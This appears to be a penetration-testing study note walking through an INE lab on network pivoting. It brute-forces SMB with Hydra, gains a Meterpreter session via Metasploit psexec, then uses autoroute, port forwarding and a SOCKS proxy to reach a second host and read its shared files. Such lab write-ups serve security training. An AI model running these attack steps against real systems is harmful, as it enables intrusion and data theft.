search

Pivoting

hashtag
Pivoting w/ INE

ping demo.ine.local # has connection from the machine
ping demo1.ine.local # does not have any connection from the machine 

nmap demo.ine.local

# SMB ports are open. Enumeration and Exploitation of SMB
nmap -sV -p 139,445 demo.ine.local
nmap -p 445 --script smb-protocols [IP] # gives the versions
nmap -p 445 --script smb-security-mode [IP] # checks the security modes
nmap -p 445 --script smb-enum-users [IP] # enumerates user accounts on the system

# create a user list with the found usernames
nano users.txt

# bruteforce
hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb

# w/ Metasploit
msfconsole -q
use exploit/windows/smb/psexec
set RHOSTS demo.ine.local
set SMBUser administrator
set SMBPass password1
exploit

# after getting a meterpreter session
getuid
sysinfo
# for demo1.ine.local -- gather IP of this
shell
ping [demo1.ine.local-IP]
Ctrl + C # to terminate the channel
metasploit > run autoroute -s [demo1.ine.local-IP]/20
background

# exploitation - scan
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit

# exploitation - scan
sessions -i 1
portfwd add -l 1234 -p 80 -r demo2.ine.local
portfwd list

# set PAYLOAD windows/meterpreter/bind_tcp

# check socks4 proxy -- gather the socks4 port
cat /etc/proxychains4.conf

# initiate the proxy
background # backgrounds the meterpreter session
use auxiliary/server/socks_proxy
show options
set SRVPORT 9050
set VERSION 4a 
exploit
jobs

proxychains nmap demo1.ine.local -sT -Pn -sV -p 445

sessions -i 1
shell
net view [demo1.ine.local-IP] # access denies
CTRL + C
migrate -N explorer.exe
shell
net view [demo1.ine.local-IP]

net use D: \\10.0.22.69\Documents
net use K: \\10.0.22.69\K$

dir D:
dir K:

CTRL + C
cat D:\\Confidential.txt
cat D:\\FLAG2.txt

In this scenario, we are conducting a penetration test against two machines in a local network: demo.ine.local and demo1.ine.local. Initially, we confirm connectivity to demo.ine.local using the ping command, but demo1.ine.local is unreachable, suggesting different network configurations or firewall settings.

We begin by scanning demo.ine.local with Nmap, revealing open SMB ports (139 and 445), indicating potential vulnerabilities. Various Nmap scripts are utilized to enumerate SMB versions, security modes, and user accounts. Using Hydra, we perform a brute force attack on the SMB service with discovered usernames, aiming to gain unauthorized access.

The Metasploit framework is then employed with the psexec module, allowing us to gain a Meterpreter session on demo.ine.local. From this session, we conduct network discovery to identify demo1.ine.local's IP address. Using autoroute within Metasploit, we establish a route to the second machine, enabling communication despite initial connectivity issues.

A SOCKS proxy is set up with proxychains, allowing us to scan demo1.ine.local over the compromised network path. After migrating the Meterpreter session to explorer.exe for stability, we use Net View and Net Use commands to access shared directories on demo1.ine.local, leading to the retrieval of sensitive files like Confidential.txt and FLAG2.txt. This demonstrates how initial exploitation of one host can facilitate lateral movement and deeper access within a network, uncovering critical information.

PreviousWordlistsNextSMB Relay Attack

Last updated